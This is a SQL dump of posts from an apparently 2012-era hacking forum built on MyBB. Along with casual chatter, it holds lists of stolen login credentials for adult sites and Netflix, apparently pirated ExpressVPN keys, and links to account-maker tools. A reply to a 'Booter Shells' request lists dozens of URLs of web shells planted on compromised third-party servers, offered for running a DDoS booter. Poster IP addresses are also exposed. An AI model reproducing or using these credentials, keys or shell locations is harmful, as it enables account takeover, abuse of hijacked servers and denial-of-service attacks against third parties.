'[quote=\'t3h jok3r\' pid=\'1718\' dateline=\'1347178287\'] That\'s some huge mother fucking list. [/quote] Heres some more: Brazzers.com Free Premium Account For Login: http://ma.brazzers.com Telly29:lawrence emack12:knight jonathan:123456 Weasel27:rehellek 3dxstar.com Free Premium Account for login: http://members.3dxstar.com/access/login markot - marina BangBros.com Free Premium Account for login: http://login.bangbros.st-secure.com fresh and new 100% working enjoy Note: use Old MEMBERS AREA http://mrmandinga:mandinga@members.bangbros.com/ http://gmanleo79:Kamehameha@members.bangbros.com/ http://strong7:7jacob@members.bangbros.com/ http://92puddle:92shallow@members.bangbros.com/ http://nhl6101:e1pu55y@members.bangbros.com/ sisterreunion.com Free Premium Account For Login: http://members.sisterreunion.com/ jrmizz5:25mizz010584 klaroffm:ku5exa liqiswi375:daabz24 louiesam1:053089 matt0301:0301matt mexgfltwkk0:quunoolor18 mexgfltnfrq:piquepist33 mobile.hustler.comFree Premium Account For Login: http://mobile.hustler.com/Auth java2486 - godzilla 5nj2jb - 3x22nd proboy74 - stormy drewwilder1 - nicole galcott - glendale p8phm8 - bcr3gh devinlad - xogovuq markramsey - rabbit wildo95 - pervert mwoollum - mw1125mw RealityGang.com Free Premium Account hitomisima - yuukoogura tbird549 - elijah5 Ztod.com Free Premium Account ChrisMelt - ChrisMelt88 pornpros.com Free Premium Account bennn100 - grimm100 arg1007 - 1007arg blackqqq - ruffyboy bullyz - makana4', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c05766f48daf476fff78d7e71e2f9048', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1736', '375', '0', '30', 'Yahoo-ACC-Maker V.1.4', '0', '62', 'R?????zo?', '1347212649', '.::Image::. [img]http://buspic.com/img/file0af5584df11.jpg[/img] .::Scan::. [img]http://buspic.com/img/fileb6a492cac31.jpg[/img] https://www.virustotal.com/file/fd31b85131b39e796ab1aafe2d6355a475f1a7af07613cd8012596ddf40481dd/analysis/ Download: http://www.mediafire.com/?968usosm95sxsa3 I take no credits for this, just sharing :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f02bbd754f67552fa2a511fe314f3c63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1738', '376', '0', '54', 'ExpressVPN codes', '0', '62', 'R?????zo?', '1347212894', 'Enjoy guys :)[spoiler]WIN:https://www.expressvpn.com/custom_installer?os=win MAC:https://www.expressvpn.com/custom_installer?os=mac KEY: EXQR4JPZ1P2Z29UY26EWXKM One Year Express VPN key! - EXMPRDDK4CKGT8CNIKCUETX KEY: ETMAKSAMMBQKFN7IWZDMPSF KEY: EUWUSHZAV4RLHV7JPLKNPDJ KEY: EQELSNUOTG7SKF261KLYGP7 KEY: EHBMYW5DN6POCLPYPOQD7W4 E0ULHPPZFB5DO9LW8M56PE8 EOQZSRVEBULKTSIXGUEWZMQ KEY: EPCYT6GPSZBGCITGAOYVWBI KEY: EEEU1IAUWDMIBPORTXJQ2JM KEY: EIY456DGCIRTJJZZWT5V5TO KEY: EQZB803PELCVA5DI1FP8VER KEY: ECK4DFUAR1C9FIZRWIPO1IL KEY: EK3KTH6KAQYRA13RSCYGLQ2 KEY: EM2RBAH1DKZDROCEIRCPCP9[/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '383ff95b2638958ce160e4cb2b1e6f79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1739', '377', '0', '54', 'Netflix accounts', '0', '62', 'R?????zo?', '1347212944', 'Netflix.com Free Premium Account stracc13@yahoo.ca - biggbigg fgarzalaredo@aol.com - bravo820 jpark1055@comcast.net - nomar103 anthjunk@hotmail.com - ripley6 aonehvac@aol.com - saint30542 applescruff420@yahoo.com - dropout jervis - jervis jeanette - jeanette jamin - jamin jaman - jaman jacqui - jacqui lauretta - lauretta nissa - nissa ytrewq - qwerty moansjones - daddy71 hirsch - hirsch homayoun - homayoun nelson - nelson janine - janine krngq81 - mothugs', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0c87c538f8233c06f8ca4731ec3e630d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1740', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '90', 'duhuh', '1347213684', 'meh whats the fun in gambling for 50 50, its like going to a casino and only playing red or black', '86.180.199.7', '1454688007', '0', '0', '0', '0', '1', '725b3a95a48aa1722f4086f0d6209482', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1741', '176', '874', '12', 'RE: [Tut]How trace an email', '0', '90', 'duhuh', '1347214058', '[quote=\'iTzIpod\' pid=\'874\' dateline=\'1345867236\'] Will try this and post results. [/quote] Got any results?', '86.180.199.7', '1454688007', '0', '0', '0', '0', '1', '1e6a5906fb3c67eb312f5b287967e60b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1742', '378', '0', '7', 'How is school for you?', '0', '82', 'iTzIpod', '1347220183', 'Mine is alright. I got the same teacher as last year. He\'s a guy. Awesome teacher. And he barely gives homework. But I got some homework so I gotta finish it. How about you? Doing homework at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e739d871248b4dfc88ce350aecc9710e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1743', '379', '0', '34', 'Itachi\'s Intermediate Signature Tutorial', '0', '82', 'iTzIpod', '1347226893', '[img]http://fc06.deviantart.net/fs71/f/2011/050/1/0/my_intermediate_signature_tut_by_itachi3760-d39w395.png[/img] I would love to try this out :3 I just don\'t have the render. I would really like that render. ;/ If you know it, please tell me? Thanks! :D Will post my result if I get that sexy render Credits: Itachi Post results below Enjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1347226940', '1', 'b6829ce4ef1282ed6fc6c44791e5daa8', '0', '1347226940'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1744', '66', '157', '63', 'RE: Read this thread before you make a Request!', '0', '82', 'iTzIpod', '1347227235', '@t3h jok3r, I can\'t edit this post. So can you? Just change the links to .net because it is .com OT: Very HQ and nice guide. It looks like a thread design. I thought it was :3 But it wasn\'t. 10/10 for thread creativity. 10/10 for the HQ thread. In my opinion, this should be stickied?', '24.212.197.164', '416597412', '1', '0', '82', '1347227303', '1', '0a394b9d5dce5e99d0628de8fe81760a', '0', '1347227303'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1745', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '112', '??????Z', '1347229657', 'awesome. nice idea! :)', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', 'e52749532fd26cb0a57c17af2b197140', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1746', '380', '0', '34', 'Simple Signature Tutorial', '0', '82', 'iTzIpod', '1347230245', '[img]http://fc03.deviantart.net/fs30/f/2008/153/b/1/Simple_Signature_Tutorial_by_AD_Praxis.png[/img] Enjoy! Post results below. Credits: Praxis Dang. Looks very cool. Will be making this but I can\'t find the render :/ But I might use a different one instead. Gonna try it and post my results later. EDIT: [img]http://i.imgur.com/9xOcT.png[/img] Ew. I rushed it because I had to finish my homework. :/', '24.212.197.164', '416597412', '1', '0', '82', '1347232958', '1', 'b28da16d561136e1c824920f45434354', '0', '1347232958'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1747', '381', '0', '3', 'Server Error', '0', '82', 'iTzIpod', '1347233155', '[img]http://i.imgur.com/Shrop.png[/img] Can\'t view my rep details.. :/ I tried refreshing countless times. And this has still occurred. And also, instead of spamming threads about these bugs, I will just edit my encounters in here.', '24.212.197.164', '416597412', '1', '0', '1', '1347234053', '1', '67dfa19dc31d7607bec590576ce34629', '0', '1347234053'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1748', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347233317', 'Lol @ \"transparent\" text. Heard of some of the songs. Kinda disappointed Drake isn\'t in there :\'( Sigh.. Drake.. Never heard Good Time before. Gonna give it a try?', '24.212.197.164', '416597412', '1', '0', '82', '1347233339', '1', '2472bea94780ac4863ebde40ec9d0a02', '0', '1347233339'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1750', '381', '1747', '3', 'RE: Server Error', '0', '1', 't3h jok3r', '1347234400', 'Fixed now, I visited the link in the image and it works perfectly now. Thanks for reporting.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b17fdee58adf3cee5c96769011ece5d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1751', '378', '1742', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347234688', 'It\'s fun for me ATM. Good thing about college, I get to learn and study about something that I love all day.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b942a725afc30f9a30b09830389038be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1752', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '1', 't3h jok3r', '1347236127', 'Great list of free VPNs, very useful for people who can\'t afford paid VPNs or don\'t want to invest.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3ea9954f6d542325d8e9fd9fe4e705f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1753', '362', '1705', '7', 'RE: List of TOP 10 HACKERS', '0', '8', 'spacefish36', '1347237432', '@ iTzIpod LOL, if that was the case then the Feds would be all over LH. @OP Nice threads, I only heard about kevin but if he really is the top then why did facebook or microsoft hire him?', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '57957f59650d01b87992cb52b6c7c376', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1754', '352', '1652', '12', 'RE: How to Take Down Websites Effectively + Proof', '0', '8', 'spacefish36', '1347237507', 'Sorry guys i didn\'t know that the link was dead lol', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '434af65dbb8350501a81af92bb572bbd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1755', '378', '1742', '7', 'RE: How is school for you?', '0', '8', 'spacefish36', '1347237561', 'My schools going perfectly.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '81803887f01c7a828f28a5d6b15f990c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1756', '354', '1656', '23', 'RE: [MBAM] Self-Help Removal Tutorials', '0', '8', 'spacefish36', '1347237614', 'Mother fucker. Huge list thanks for this man.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '751aabc2d5fa2babbed0a7dfb40592a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1757', '360', '1694', '58', 'RE: What are the official groups?', '0', '8', 'spacefish36', '1347237703', 'Damn only two groups? I might suggest a group to LH', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'e567ada73a460b1ea60089f8e5773aff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1758', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '8', 'spacefish36', '1347237893', 'I\'ll be making one SMS Bomber today and your last link doesn\'t work.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '17257d69499d83a92886bdaf70ed3138', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1759', '317', '1685', '61', 'RE: Unique\'s Purpose', '0', '1', 't3h jok3r', '1347246213', '[quote=\'p420\' pid=\'1685\' dateline=\'1347076729\'] Quick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod. [/quote] You can request a group to. You don\'t have to be a Mod, Staff or Admin to request a official group.', '72.229.164.105', '1223009385', '1', '0', '1', '1347246329', '1', 'ee5d254bba81c695bdaff57954a12ce5', '0', '1347246329'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1760', '382', '0', '43', '[file ice]4 windows 8 keys', '0', '1', 't3h jok3r', '1347247699', 'http://window8serialkeys.blogspot.com/ 4 available. Use fakenamegenerator to bypass surveys.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6eeceeae01e07f70f769946ab9ca440e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1761', '370', '1721', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '1', 't3h jok3r', '1347248932', 'Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6d3f45aeceeb1e43f976e480bc129c6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1762', '345', '1632', '63', 'RE: Need userbar! [Gamers{]', '0', '1', 't3h jok3r', '1347249002', 'Both look kinda same but I would say the second one a bit better than the first one.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '453806828eb4f2f96512dd6125a51653', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1764', '377', '1739', '54', 'RE: Netflix accounts', '0', '1', 't3h jok3r', '1347249436', 'It\'s it\'s it\'s sooo beautiful <sniff sniff> I\'m talking about your sig ;) Thanks for the netflix accounts. A lot of people request premium netflix accounts.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c5cef801f3119badaf4094093374f5a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1765', '383', '0', '29', 'Paypal Withdrawy to cash or debit card [TUT DL]', '0', '112', '??????Z', '1347258711', 'okay so with these methods you can withdraw your paypal cash either to cash or debit card, the cash one is very useful if you don\'t want to give any of your personal information to paypal. These tutorials was given to my by a friend so credit doesn\'t belong to me, but if this helped you then please +Rep me. thanks Withdraw to debit card: http://www.mediafire.com/?z44xmusno4zj12h Withdraw to cash: http://www.mediafire.com/?c8i97f2oa8jbx4b', '92.22.255.215', '1545011159', '0', '0', '0', '0', '1', 'a43fb032eb15d33692fdf9feb0c0a5ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1766', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '67', 'HoverCatz', '1347277657', 'I can send you if you still need it. I may send 2 due to the fee', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', 'c7ab36040f8c28a9e97be62dc2650636', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1767', '384', '0', '55', 'Booter Shells', '0', '67', 'HoverCatz', '1347299119', 'Hey. Im in need of some working shells. Doesnt need to be private ones, but that they work. If my booter is a success, i may give you some of the cash i make on it. Note, i always remember stuff people do for me, so i will almost always do something in return.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3d79d2aa6f3173a903175056d3445c7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1768', '385', '0', '19', '[Junk][Important] Discussion', '0', '82', 'iTzIpod', '1347305265', 'I\'m thinking about leaving LH. What are your thoughts?', '24.212.197.164', '416597412', '1', '0', '82', '1348107416', '1', 'f63ab509ecd692ab20c6b597d8287617', '0', '1348107416'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1769', '385', '1768', '19', 'RE: Discussion', '0', '9', 'p420', '1347313251', 'Don\'t, why do you want to leave LH? You have respect, you have the most awards, you run a official group(free), you are a Mod. You would not just lose all this but LH would lose a lot of activity as well.', '173.245.64.117', '-1376436107', '0', '0', '0', '0', '1', '4944879c5865b5b57ba584c441cf0469', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1770', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347326964', 'Done, sent to your kennerz. Thanks for the HQ threads.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '66d854e4f3f658eb74eb23fa707149d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1771', '384', '1767', '55', 'RE: Booter Shells', '0', '5', 'Timmy', '1347327508', 'Not sure if they work or not but check them on a shell checker. [code] 192.163.135.131/webdav/shells.php 192.163.135.104/webdav/shells.php 192.163.135.115/webdav/shells.php 192.163.135.101/webdav/shells.php http://c3sd.com/webdav/x32.php http://80.72.41.147/webdav/x32.php http://84.77.246.35/webdav/x32.php http://hardstyle-creation.de/webdav/x32.php http://dns-office.vz.ae/webdav/x32.php http://lovencompany.com/webdav/x32.php http://trandigital.com/webdav/x32.php http://ftpserver.inwindowoutdoor.com/webdav/x32.php http://nevyhazujto.cz/webdav/x32.php http://115.64.70.98/webdav/x32.php http://enwalker84.zombiefire.com/webdav/x32.php http://asterware.net/webdav/x32.php http://222.124.219.220/webdav/x32.php http://yegenkids.com/webdav/x32.php http://69.70.21.244/webdav/x32.php http://75.127.113.116/webdav/x32.php http://122.226.220.7/webdav/x32.php http://87.106.182.104/webdav/x32.php http://85.232.156.145/webdav/x32.php http://81.25.26.80/webdav/x32.php http://parkstagedoor.com/webdav/webdav.php http://milkmytorrent.com/webdav/webdav.php http://62.174.90.10/webdav/webdav.php http://83.169.10.151/webdav/x32.php http://217.16.8.44/webdav/x32.php http://203.37.179.130/webdav/x32.php http://freedenverdeals.com/webdav/x32.php http://teslatronic.net/webdav/x32.php http://embarquefacil.com.br/webdav/x32.php http://pavesouth.com/webdav/x32.php http://playing-by-heart.com/webdav/x32.php http://salfetky.com/webdav/x32.php http://ccpsoft.de/webdav/x32.php http://coaching.wsptwp.eu/webdav/x32.php http://dreamtec.eu/webdav/x32.php http://camperdiem.es/webdav/x32.php http://eachsaturday.com/webdav/x32.php http://key-cs.nl/webdav/x32.php http://gamefameusa.com/webdav/x32.php http://esmclan.nl/webdav/x32.php http://todoejercicios.com/webdav/x32.php http://202.162.77.12/webdav/x32.php http://khuphodem.com/webdav/x32.php http://eye-channel.nl/webdav/x32.php http://dltz.nl/webdav/x32.php http://wilco-online.nl/webdav/x32.php http://online-reisgids.nl/webdav/x32.php http://ethicgamers.com/webdav/x32.php http://led3d.net/webdav/x32.php http://wdc.geophys.cn/webdav/x32.php http://yameile.com.tw/webdav/x32.php http://jjhydro.com/webdav/x32.php http://mogeyq.co.cc/webdav/x32.php http://f1onacharge.com/webdav/x32.php http://praxissoftware.co.nz/webdav/x32.php http://aknr.com/webdav/x32.php http://hulettscoffeequest.co.za/webdav/x32.php http://mail.inventiveprint.co.uk:8080/webdav/x32.php http://egg-leo.co.cc/webdav/x32.php http://life-digital.co.cc/webdav/x32.php http://citylife.co.za/webdav/x32.php http://shouthost.tk/webdav/x32.php http://diesamariter-villach.at/webdav/x32.php http://hrs-spiratube.com/webdav/x32.php http://tqm.co.th/webdav/x32.php http://neocen.com/webdav/x32.php http://ideasjuggler.com/webdav/x32.php http://21mmm.com/webdav/x32.php http://olcc.nlc.gov.cn/webdav/x32.php http://tomgroup.com/webdav/x32.php [/code]', '72.229.164.105', '1223009385', '1', '0', '5', '1347327532', '1', '487c7d60d4a18bfb3c011d20d5b16d62', '0', '1347327532'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1772', '386', '0', '24', 'Rar Password Unlocker v2.1', '0', '5', 'Timmy', '1347328500', '[align=center][img]http://cdn2.afterdawn.fi/screenshots/normal/5844.jpg[/img][/align] [b]Rar Password Unlocker v2.1[/b] Appnimi Rar Password Unlocker is useful software to recover the password of protected RAR files.It supports both brute force as well as dictionary based password recovery technique that can help you to recover not only easy but also complex passwords. Once password is uncovered it automatically extracts the RAR file contents to target location. It can be used by anyone who has forgotten the password of their RAR files. Also it can be great tool for forensic engineers in recovering password of secret RAR files. It presents simple and cool interface making it easy for every one. It works on wide range of operating systems starting from Windows 98 to latest, Windows 7. [b]Features[/b] Here are the highlights of the features Easy to use with its elegant GUI interface. Recover password of any length & complexity. Brute-Force method to recover password with prefix & suffix characters. Support for dictionary based password recovery method. Customize various parameters for effective password recovery. Support Windows 98, ME, NT, 2000, XP, 2003, Vista & Windows 7 [b]Using RarPasswordUnlocker[/b] RarPasswordUnlocker is easy to use with its simple GUI interface even for beginners. [b]Here are the brief usage details,[/b] Download the RarPasswordUnlocker and run the installer. After installation, run \"Appnimi RAR Password Unlocker\" using one of the shortcuts on desktop or in the startup menu. Enter the path to password protected RAR file Enter the minimum and maximum length of the password Now click on Start button to start the password recovery process. During the operation, it will show number of attempts and the last attempted password On successful recovery, Message will be shown with the recovered password. [b]Download:[/b] [code] http://uploaded.net/file/kqx6kd4m/PasswordUnlocker2.1.zip [/code]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c67204ee3b0af7a81c4eac20a0fcf532', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1773', '274', '1274', '42', 'RE: Another death in the family for Sylvester Stallone', '0', '5', 'Timmy', '1347328804', 'He looked so old in the movie. OT: RIP', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9d470d49846791586fbb83029fbeab10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1774', '333', '1565', '42', 'RE: Six Degrees Made For Adult Students', '0', '5', 'Timmy', '1347328849', 'Computing Computing Computing All the highest demanded jobs involve computing then why hate the internet so much?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'f6acd132ab0a601a19c4af16a50b94d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1775', '387', '0', '24', 'Good add ons on your computer.. Best upgrades on old computers', '0', '5', 'Timmy', '1347328926', '[b]System memory, hard drives and video cards[/b] While they might not be as sexy as a sleek new monitor or designer laptop skins, adding more memory — be it RAM or hard drive space — can really help boost performance of an older computer. And you don\'t need a degree in computer engineering to add both kinds of memory to a laptop or desktop. The former 